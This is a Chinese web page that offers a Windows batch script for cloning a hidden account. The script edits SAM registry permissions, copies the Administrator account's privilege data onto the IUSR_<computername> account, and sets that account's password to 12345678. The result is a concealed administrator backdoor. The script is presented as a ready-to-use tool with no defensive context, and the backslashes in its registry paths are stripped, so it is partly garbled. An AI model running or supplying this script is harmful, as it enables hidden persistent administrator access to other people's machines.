windows 复制隐藏帐号完全批处理
windows 复制隐藏帐号完全批处理
发布时间:2016-12-28 来源:查字典编辑
摘要:复制代码代码如下:echooffsetlocalenabledelayedexpansionecho%computername%echoHK...

复制代码 代码如下:

echo off

setlocal enabledelayedexpansion

echo %computername%

echo HKEY_LOCAL_MACHINESAMSAM [1 17] >"%windir%..1.reg"

regini "%windir%..1.reg"

regedit /e "%windir%..1.reg" HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNamesIUSR_%computername%

rem unicode ->ascii

type "%windir%..1.reg" >"%windir%..2.reg"

del /q "%windir%..1.reg"

rem find IUSR_%computername% 的对应id

for /F "delims=( tokens=1-5* skip=3" %%a in (%windir%..2.reg) do set iusr_id=%%b

del /q "%windir%..2.reg"

rem export administrator register

regedit /e "%windir%..1.reg" HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4

type "%windir%..1.reg" >"%windir%..2.reg"

del /q "%windir%..1.reg"

rem replace 1fx->iusr_id

for /f "tokens=* delims=:" %%i in (%windir%..2.reg) do (

for /f "tokens=*" %%j in ("%%i") do (

set TMP=%%j

set "TMP=!TMP:000001F4=00000%iusr_id:~0,3%!"

echo !TMP!>>%windir%..1.reg

)

)

regedit /s %windir%..1.reg

del /q %windir%..1.reg

del /q %windir%..2.reg

echo HKEY_LOCAL_MACHINESAMSAM [17] >"%windir%..1.reg"

regini "%windir%..1.reg"

del /q "%windir%..1.reg"

net user IUSR_%computername% 12345678

克隆出来的用户名是固定的,随便变换的话要改代码

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新DOS/BAT学习
热门DOS/BAT学习
脚本专栏子分类